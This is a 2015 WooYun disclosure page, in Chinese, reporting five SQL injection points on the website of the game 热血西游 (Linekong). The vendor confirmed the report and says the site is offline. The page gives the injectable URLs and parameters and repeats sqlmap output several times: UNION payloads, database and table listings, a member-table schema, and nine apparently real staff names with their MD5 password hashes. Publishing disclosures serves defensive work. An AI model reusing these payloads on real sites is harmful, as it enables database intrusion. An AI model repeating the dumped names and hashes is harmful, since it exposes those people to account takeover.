蓝港科技(热血西游)网站多处SQL注入打包

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0119438

漏洞标题：蓝港科技(热血西游)网站多处SQL注入打包

漏洞作者：路人甲

提交时间：2015-06-10 09:46

修复时间：2015-07-25 18:26

公开时间：2015-07-25 18:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-10：细节已通知厂商并且等待厂商处理中
2015-06-10：厂商已经确认，细节仅向厂商公开
2015-06-20：细节向核心白帽子及相关领域专家公开
2015-06-30：细节向普通白帽子公开
2015-07-10：细节向实习白帽子公开
2015-07-25：细节向公众公开

简要描述：

详细说明：

五处注入(三处POST，两处GET)
第一处POST注入

http://rx.8864.com/gonglist.php?sort_id=*
POST参数
passportName_login=vhuuhbwv&passportPswd_login=111122223&save=on&save_password=on&validate_login=vhuuhbwv
注入点：sort_id

第二处POST注入

http://rx.8864.com/imagelist.php?page=2&sort_id=*
POST参数
passportName_login=cyfjcsuj&passportPswd_login=111122223&save=on&save_password=on&validate_login=cyfjcsuj
注入点：sort_id

第三处 GET注入

http://rx.8864.com/imagelist.php?page=2&sort_id=*
注入点：sort_id

第四处 POST注入

http://rx.8864.com/imagelist.php?&sort_id=*
POST参数
passportName_login=rmsggysd&passportPswd_login=111122223&save=on&save_password=on&validate_login=rmsggysd
注入点：sort_id

第五处GET注入
第三处 GET注入

http://rx.8864.com/imagelist.php?&sort_id=*
注入点：sort_id

sqlmap identified the following injection points with a total of 891 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (random number) - 4 columns
    Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359-- 
    Vector:  UNION ALL SELECT 6013,6013,[QUERY],6013-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] information_schema
[*] rxxy_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (random number) - 4 columns
    Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359-- 
    Vector:  UNION ALL SELECT 1926,1926,[QUERY],1926-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: rxxy_web
[31 tables]
+------------------------------+
| rxxy_activity_firstjh_cdkey  |
| rxxy_activity_firstjh_log    |
| rxxy_activity_firstjh_lunpan |
| rxxy_activity_firstjh_vote   |
| rxxy_address                 |
| rxxy_article                 |
| rxxy_article_inserl          |
| rxxy_build                   |
| rxxy_channel                 |
| rxxy_columns                 |
| rxxy_comment                 |
| rxxy_download                |
| rxxy_editors_inserl          |
| rxxy_flash                   |
| rxxy_grading                 |
| rxxy_group                   |
| rxxy_image                   |
| rxxy_image_inserl            |
| rxxy_member                  |
| rxxy_passportstat            |
| rxxy_sort                    |
| rxxy_template                |
| rxxy_url                     |
| rxxy_url_inserl              |
| rxxy_vote                    |
| rxxy_vote_inserl             |
| rxxy_vote_option             |
| rxxy_wj_article              |
| rxxy_wj_article_inserl       |
| rxxy_wj_image                |
| rxxy_wj_image_inserl         |
+------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (random number) - 4 columns
    Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359-- 
    Vector:  UNION ALL SELECT 9254,9254,[QUERY],9254-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (random number) - 4 columns
    Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359-- 
    Vector:  UNION ALL SELECT 4670,4670,[QUERY],4670-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (random number) - 4 columns
    Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359-- 
    Vector:  UNION ALL SELECT 7537,7537,[QUERY],7537-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: rxxy_web
Table: rxxy_member
[26 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| address_id     | int(11)      |
| article_id     | int(11)      |
| group_id       | int(11)      |
| id             | int(11)      |
| image_id       | int(11)      |
| nickname       | varchar(64)  |
| uadd_time      | datetime     |
| url_id         | int(11)      |
| user_age       | date         |
| user_Dreply    | int(11)      |
| user_Dtopic    | int(11)      |
| user_email     | varchar(32)  |
| user_grading   | varchar(64)  |
| user_jointime  | datetime     |
| user_like      | varchar(255) |
| user_movephone | varchar(32)  |
| user_msn       | varchar(128) |
| user_name      | varchar(32)  |
| user_passwd    | varchar(32)  |
| user_perfect   | int(11)      |
| user_qq        | int(11)      |
| user_sex       | int(2)       |
| user_state     | int(2)       |
| user_Treply    | int(11)      |
| user_Ttopic    | int(11)      |
| vote_id        | int(11)      |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (random number) - 4 columns
    Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359-- 
    Vector:  UNION ALL SELECT 6116,6116,[QUERY],6116-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: rxxy_web
Table: rxxy_member
[9 entries]
+-----------+----------------------------------+
| user_name | user_passwd                      |
+-----------+----------------------------------+
| 董勇        | 862f3760ca3293437b53cac01b0ffe29 |
| 王磊        | e10adc3949ba59abbe56e057f20f883e |
| 刘志刚       | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| 运维值班工程师   | cbef2ead7978557272b0c692f356b3cd |
| 韩秋莹       | 2f090f77c0d55fdf508e324140050160 |
| 张静        | a10f4b7e48419178177232d2d31dc4b8 |
| 张晨        | 92a870e23eaac7b3c576e91b807f2a60 |
| 李治        | 7e42a7ea7643c35fa5854f0f8d6e9131 |
| 黄孟琪       | 471c75ee6643a10934502bdafee198fb |
+-----------+----------------------------------+

漏洞证明：

sqlmap identified the following injection points with a total of 891 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (random number) - 4 columns
    Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359-- 
    Vector:  UNION ALL SELECT 6013,6013,[QUERY],6013-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] information_schema
[*] rxxy_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (random number) - 4 columns
    Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359-- 
    Vector:  UNION ALL SELECT 1926,1926,[QUERY],1926-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: rxxy_web
[31 tables]
+------------------------------+
| rxxy_activity_firstjh_cdkey  |
| rxxy_activity_firstjh_log    |
| rxxy_activity_firstjh_lunpan |
| rxxy_activity_firstjh_vote   |
| rxxy_address                 |
| rxxy_article                 |
| rxxy_article_inserl          |
| rxxy_build                   |
| rxxy_channel                 |
| rxxy_columns                 |
| rxxy_comment                 |
| rxxy_download                |
| rxxy_editors_inserl          |
| rxxy_flash                   |
| rxxy_grading                 |
| rxxy_group                   |
| rxxy_image                   |
| rxxy_image_inserl            |
| rxxy_member                  |
| rxxy_passportstat            |
| rxxy_sort                    |
| rxxy_template                |
| rxxy_url                     |
| rxxy_url_inserl              |
| rxxy_vote                    |
| rxxy_vote_inserl             |
| rxxy_vote_option             |
| rxxy_wj_article              |
| rxxy_wj_article_inserl       |
| rxxy_wj_image                |
| rxxy_wj_image_inserl         |
+------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (random number) - 4 columns
    Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359-- 
    Vector:  UNION ALL SELECT 9254,9254,[QUERY],9254-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (random number) - 4 columns
    Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359-- 
    Vector:  UNION ALL SELECT 4670,4670,[QUERY],4670-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (random number) - 4 columns
    Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359-- 
    Vector:  UNION ALL SELECT 7537,7537,[QUERY],7537-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: rxxy_web
Table: rxxy_member
[26 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| address_id     | int(11)      |
| article_id     | int(11)      |
| group_id       | int(11)      |
| id             | int(11)      |
| image_id       | int(11)      |
| nickname       | varchar(64)  |
| uadd_time      | datetime     |
| url_id         | int(11)      |
| user_age       | date         |
| user_Dreply    | int(11)      |
| user_Dtopic    | int(11)      |
| user_email     | varchar(32)  |
| user_grading   | varchar(64)  |
| user_jointime  | datetime     |
| user_like      | varchar(255) |
| user_movephone | varchar(32)  |
| user_msn       | varchar(128) |
| user_name      | varchar(32)  |
| user_passwd    | varchar(32)  |
| user_perfect   | int(11)      |
| user_qq        | int(11)      |
| user_sex       | int(2)       |
| user_state     | int(2)       |
| user_Treply    | int(11)      |
| user_Ttopic    | int(11)      |
| vote_id        | int(11)      |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (random number) - 4 columns
    Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359-- 
    Vector:  UNION ALL SELECT 6116,6116,[QUERY],6116-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: rxxy_web
Table: rxxy_member
[9 entries]
+-----------+----------------------------------+
| user_name | user_passwd                      |
+-----------+----------------------------------+
| 董勇        | 862f3760ca3293437b53cac01b0ffe29 |
| 王磊        | e10adc3949ba59abbe56e057f20f883e |
| 刘志刚       | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| 运维值班工程师   | cbef2ead7978557272b0c692f356b3cd |
| 韩秋莹       | 2f090f77c0d55fdf508e324140050160 |
| 张静        | a10f4b7e48419178177232d2d31dc4b8 |
| 张晨        | 92a870e23eaac7b3c576e91b807f2a60 |
| 李治        | 7e42a7ea7643c35fa5854f0f8d6e9131 |
| 黄孟琪       | 471c75ee6643a10934502bdafee198fb |
+-----------+----------------------------------+

修复方案：

参数过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-06-10 18:25

厂商回复：

该产品已下线，我们着手关闭站点的操作。感谢

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0119438

漏洞标题：蓝港科技(热血西游)网站多处SQL注入打包

相关厂商：linekong.com

漏洞作者：路人甲

提交时间：2015-06-10 09:46

修复时间：2015-07-25 18:26

公开时间：2015-07-25 18:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0119438

漏洞标题：蓝港科技(热血西游)网站多处SQL注入打包

相关厂商：linekong.com

漏洞作者： 路人甲

提交时间：2015-06-10 09:46

修复时间：2015-07-25 18:26

公开时间：2015-07-25 18:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0119438"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云